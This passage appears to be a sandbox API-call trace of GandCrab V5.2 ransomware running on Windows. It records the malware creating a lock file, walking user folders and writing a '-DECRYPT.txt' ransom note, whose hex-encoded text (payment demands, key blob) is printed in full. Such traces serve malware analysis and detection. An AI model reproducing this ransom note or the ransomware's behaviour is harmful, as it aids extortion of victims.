0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0069.083] WriteFile (in: hFile=0x228, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259f79c, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259f79c*=0x2162, lpOverlapped=0x0) returned 1 [0069.083] CloseHandle (hObject=0x228) returned 1 [0069.083] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.084] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0069.084] GetSystemTime (in: lpSystemTime=0x25d0400 | out: lpSystemTime=0x25d0400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0xe, wMilliseconds=0x18e)) [0069.084] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0069.084] GetWindowsDirectoryW (in: lpBuffer=0x2630000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0069.084] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2630200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2630600, lpMaximumComponentLength=0x2630608, lpFileSystemFlags=0x2630604, lpFileSystemNameBuffer=0x2630400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2630600*=0xd2ca4def, lpMaximumComponentLength=0x2630608*=0xff, lpFileSystemFlags=0x2630604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0069.084] wsprintfW (in: param_1=0x25d0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\d2ca4a09d2ca4deb61a.lock") returned 46 [0069.084] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x228 [0069.085] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.085] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.086] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\") returned 22 [0069.086] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\*" [0069.086] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\*", fInfoLevelId=0x1, lpFindFileData=0x259f7b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259f7b8) returned 0x503678 [0069.086] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0069.086] FindNextFileW (in: hFindFile=0x503678, lpFindFileData=0x259f7b8 | out: lpFindFileData=0x259f7b8) returned 1 [0069.086] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0069.086] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0069.086] FindNextFileW (in: hFindFile=0x503678, lpFindFileData=0x259f7b8 | out: lpFindFileData=0x259f7b8) returned 1 [0069.086] lstrcmpW (lpString1="AppData", lpString2=".") returned 1 [0069.086] lstrcmpW (lpString1="AppData", lpString2="..") returned 1 [0069.086] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\", lpString2="AppData" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData" [0069.086] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\" [0069.086] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x25d0000 [0069.086] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0069.087] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0069.087] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0069.087] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0069.087] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0069.087] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0069.087] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0069.087] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0069.087] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.087] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0069.088] wsprintfW (in: param_1=0x25d0200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\\\TITWMVJL-DECRYPT.txt") returned 51 [0069.088] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230 [0069.088] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x